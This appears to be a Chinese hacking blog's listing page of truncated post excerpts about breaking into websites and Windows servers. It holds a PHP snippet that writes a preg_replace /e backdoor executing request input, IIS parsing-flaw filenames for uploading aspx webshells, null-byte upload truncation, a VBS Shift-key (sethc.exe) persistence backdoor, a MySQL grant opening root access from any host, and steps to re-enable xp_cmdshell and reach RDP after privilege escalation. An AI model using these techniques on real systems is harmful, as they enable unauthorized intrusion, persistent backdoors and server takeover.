摘要： php:$dir = 'aaa/'; createDir($dir); $fp = fopen($dir.'xxxx.php', "w"); fputs($fp, '<?php echo "error";preg_replace("/test/e",$_REQUEST[\'abc\'],"jutst test")?>'); fclose($fp); function createDir($path) { if (!file_exists($ 阅读全文

摘要： 主站是:www.xxxx.biz环境:linux php nginx，伪静态的。主站基本是没希望，不过xss很多，懒得去利用。有公司有一个新新业务，所以开发部门建立了一个新的网站，所以我也就..........开始看了下dz 7.5的，自己修改了一些东西，尝试了公开的0DAY没戏，各种尝试无果。最后丢到wvs里面一扫，一会就出来了一个本地包含漏洞，详细继续。根据WVS扫描结果，漏洞发生在以下页面：&id=17这是一个很明显的本地文件包含漏洞但是这个漏洞使用相对路径来进行包含是不成功的，要使用绝对路径，在以下文件发现phpinfo信息http://www.cntuike.net/info 阅读全文

摘要： GRANT ALL PRIVILEGES ON *.* TO ‘root’@'%’ IDENTIFIED BY ‘pass’ WITH GRANT OPTION; 阅读全文

摘要： 进后台看看：1.有上传2.有数据库操作3.有系统设置拿shell，我有三种方法1.上传直接上传抓包爆出路径filepath，这里可以考虑NC提交，或者本地修改元素建立.asp文件夹这里我直接用googlechrome审查元素../uppics/1.asa/201211920201285298.jpg2.数据库恢复这里先直接传一张图片马，然后得到路径../uppics/201211920215665549.jpg之后进行数据库恢复后台数据库路径输入框依旧点击不了，这可以本地构造突破掉，这里还是用googlechrome修改元素干掉它恢复路径可以随便写，只要有写入权限就可以了，点击确定OK，成功， 阅读全文

摘要： IIS6.0解析漏洞，可以上传a.asp;.jps或者a.asp;a.jpg或者a.asp目录下传任意格式小马，都会解析这次讲的是IIS7.5解析漏洞，http://www.site.com/fckeditor/editor/fckeditor.html上传图片，浏览，上传一个aspx的一句话木马，名字为：a.aspx.a;.a.aspx.jpg..jpg，上传后直接得到上传地址 阅读全文

摘要： reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" 阅读全文

摘要： 今日低调在知道区发帖求助]http://forum.daokers.com/read.php?tid=3048说后台地址，用户名和密码都有，拿不到shell。不久wbxym和ljb17就分别2种办法上传好了shell。wbxym的方法很简单就是本地上传，修改action的地址为上传页面并且在路径后面加上*.asp;或者加个.也行。就不多做介绍。ljb17的方法是抓包，利用nc上传。他这里路径有2种办法，第一个办法是和上面一样，添加*.asp;，第二种办法就是截断，直接在路径后面加*.asp空格，然后在16进制下面将20改为00.然后抓包上传。这里要切记如果文件大小有变化，一定要修改包的大小。今 阅读全文

摘要： 大家都知道Shift后门对应的文件为：sethc.exe只要把sethc.exe挟持，别人就删不掉了。程序代码：Set WshShell = WScript.CreateObject("WScript.Shell")WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\debugger",WScript.CreateObject("WScript.shell 阅读全文

摘要： SQL Server 阻止了对组件 ‘xp_cmdshell’ 的 过程’sys.xp_cmdshell’的访问，因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用‘xp_cmdshell’。有关启用‘xp_cmdshell’ 的详细信息，请参阅 SQL Server 联机丛书中的“外围应用配置器”。SQL2005 在默认的设置中是删除了 XP_CMDSHELL的，因此也在注射过程中产生了点困难。后来经过查看MSSQL2005的手册才知道情况原来如此：用下面一句话就可以了解决了。 ;EXEC sp_configure ‘show advan 阅读全文

摘要： 遇到一个问题，提权成功 用户加入了 administrators Remote Desktop Users 两个组，3389登录提示有问题相信有少部分朋友遇到过这种问题，而我是第一次遇到，现在以经解决，首先，我是建立了SHIFT后门，进去以后在如下操作。处理办法:1. "控制面板" --> "管理工具" --> "终端服务配置"2. 点击"连接", 右边出现连接项(例如: RDP-Tcp,tcp,Microsoft RDP 5.2)3. 双击要修改的连接项。3. 弹出窗口, 单击"权限&quo 阅读全文